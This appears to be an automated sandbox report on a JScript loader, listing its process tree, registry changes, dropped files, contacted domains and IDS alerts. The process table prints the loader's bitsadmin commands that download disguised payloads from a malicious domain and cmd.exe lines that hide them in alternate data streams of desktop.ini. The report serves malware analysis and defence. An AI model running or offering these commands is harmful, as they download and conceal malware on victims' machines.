File name: | bmd7i29.JS |
Full analysis: | https://app.any.run/tasks/ba44468c-a9ba-4a59-8305-1ef465c945b9 |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | November 21, 2019, 16:41:52 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with no line terminators |
MD5: | 12E8BA05EFFEA4B55613C16B1439986F |
SHA1: | BA1B7B7BB7C4E028C0F392C1EF19B58569DBAC7B |
SHA256: | 2C7FA3A8BCC108185DA9F9CB9C4218578FA30CF03CA9A8FEA3379CB89374FB77 |
SSDEEP: | 3:YYGRacVpKjnAMHW6MdMI5sF:5rkpKjWdDw |
.bs/bin | | | PrintFox (C64) bitmap (100) |
---|
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1412 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Downloads\bmd7i29.JS" | C:\Windows\System32\WScript.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Version: 5.8.7600.16385 Modules
| |||||||||||||||
388 | "C:\Windows\System32\bitsadmin.exe" /transfer 15302 /priority foreground https://t3eiyui93at8.admi2939vcu94.gq/?04/lpquayevvta.jpg.zip C:\Users\Public\Libraries\yanki\lpquayevvta.jpg | C:\Windows\System32\bitsadmin.exe | — | WScript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: BITS administration utility Exit code: 2147954557 Version: 7.5.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2200 | "C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\yanki\lpquayevvta.jpg" > "C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvta.jpg"&&erase "C:\Users\Public\Libraries\yanki\lpquayevvta.jpg" | C:\Windows\System32\cmd.exe | — | WScript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
3324 | "C:\Windows\System32\bitsadmin.exe" /transfer 75668 /priority foreground https://t3eiyui93at8.admi2939vcu94.gq/?04/lpquayevvtb.jpg.zip C:\Users\Public\Libraries\yanki\lpquayevvtb.jpg | C:\Windows\System32\bitsadmin.exe | — | WScript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: BITS administration utility Exit code: 0 Version: 7.5.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2428 | "C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\yanki\lpquayevvtb.jpg" > "C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtb.jpg"&&erase "C:\Users\Public\Libraries\yanki\lpquayevvtb.jpg" | C:\Windows\System32\cmd.exe | — | WScript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
3788 | "C:\Windows\System32\bitsadmin.exe" /transfer 75635 /priority foreground https://t3eiyui93at8.admi2939vcu94.gq/?04/lpquayevvtc.jpg.zip C:\Users\Public\Libraries\yanki\lpquayevvtc.jpg | C:\Windows\System32\bitsadmin.exe | — | WScript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: BITS administration utility Exit code: 0 Version: 7.5.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2496 | "C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\yanki\lpquayevvtc.jpg" > "C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtc.jpg"&&erase "C:\Users\Public\Libraries\yanki\lpquayevvtc.jpg" | C:\Windows\System32\cmd.exe | — | WScript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
2748 | "C:\Windows\System32\bitsadmin.exe" /transfer 58255 /priority foreground https://t3eiyui93at8.admi2939vcu94.gq/?04/lpquayevvtdwwn.gif.zip C:\Users\Public\Libraries\yanki\lpquayevvtdwwn.gif | C:\Windows\System32\bitsadmin.exe | — | WScript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: BITS administration utility Exit code: 0 Version: 7.5.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2928 | "C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\yanki\lpquayevvtdwwn.gif" > "C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtdwwn.gif"&&erase "C:\Users\Public\Libraries\yanki\lpquayevvtdwwn.gif" | C:\Windows\System32\cmd.exe | — | WScript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
3540 | "C:\Windows\System32\bitsadmin.exe" /transfer 23221 /priority foreground https://t3eiyui93at8.admi2939vcu94.gq/?04/lpquayevvtdx.gif.zip C:\Users\Public\Libraries\yanki\lpquayevvtdx.gif | C:\Windows\System32\bitsadmin.exe | — | WScript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: BITS administration utility Exit code: 0 Version: 7.5.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (1412) WScript.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32 |
Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
(PID) Process: | (1412) WScript.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32 |
Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
(PID) Process: | (1412) WScript.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32 |
Operation: | write | Name: | FileTracingMask |
Value: 4294901760 | |||
(PID) Process: | (1412) WScript.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32 |
Operation: | write | Name: | ConsoleTracingMask |
Value: 4294901760 | |||
(PID) Process: | (1412) WScript.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32 |
Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
(PID) Process: | (1412) WScript.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32 |
Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
(PID) Process: | (1412) WScript.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS |
Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
(PID) Process: | (1412) WScript.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS |
Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
(PID) Process: | (1412) WScript.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS |
Operation: | write | Name: | FileTracingMask |
Value: 4294901760 | |||
(PID) Process: | (1412) WScript.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS |
Operation: | write | Name: | ConsoleTracingMask |
Value: 4294901760 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1412 | WScript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@00rr32jwi949ikrfm77[1].txt | text | |
MD5:388CC579231FB9A55E1F7F5A7ECCA726 | SHA256:76D1AC39A8C631633581D2CFCB6364C61881F686F32BAC230BD99CC954566F25 | |||
2496 | cmd.exe | C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtc.jpg | binary | |
MD5:22BF214121CFB0107CD5642995B62AE2 | SHA256:6A75F5C9D9A05025A5BBFBB3F328AA1B533B8F263E081FAAE6AF5621EE773164 | |||
2428 | cmd.exe | C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtb.jpg | binary | |
MD5:F2CF0BC2A11C62AFA0FD80A3E8CD704D | SHA256:C7F2327AF387BE23D5A6FC7FA9DDC0CA6E7BE180F0588440BE9C3EFCA04A1AAC | |||
2928 | cmd.exe | C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtdwwn.gif | binary | |
MD5:5B1B26B50C386467713C19DFADB6E5D7 | SHA256:F7145CD84BBB76FE5AEC655680781E3000B56343091D2313D205D1DBA798F49D | |||
3332 | cmd.exe | C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtdx.gif | binary | |
MD5:420CA9F3B004FB712BB65FCEF471E528 | SHA256:963B620478D180D7CFB7951D997D8FE55F73BB8C04ECA7CA5944E1D20B0271F5 | |||
1412 | WScript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\wwa5tur9iae3_00rr32jwi949ikrfm77_ml[1].txt | xml | |
MD5:64922403CB5BA44BCA4AA2F972A8A166 | SHA256:957EE6033CE0E9227C023014EE13AB4AC0D184A0B64DCB8398531291EC20A7B8 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1412 | WScript.exe | 104.18.37.173:443 | wwa5tur9iae3.00rr32jwi949ikrfm77.ml | Cloudflare Inc | US | suspicious |
— | — | 104.28.21.40:443 | t3eiyui93at8.admi2939vcu94.gq | Cloudflare Inc | US | malicious |
Domain | IP | Reputation |
---|---|---|
wwa5tur9iae3.00rr32jwi949ikrfm77.ml |
| suspicious |
t3eiyui93at8.admi2939vcu94.gq |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO DNS Query for Suspicious .ml Domain |
— | — | Potentially Bad Traffic | ET INFO Suspicious Domain (*.ml) in TLS SNI |
— | — | Potentially Bad Traffic | ET INFO DNS Query for Suspicious .gq Domain |
— | — | Potentially Bad Traffic | ET INFO Suspicious Domain (*.gq) in TLS SNI |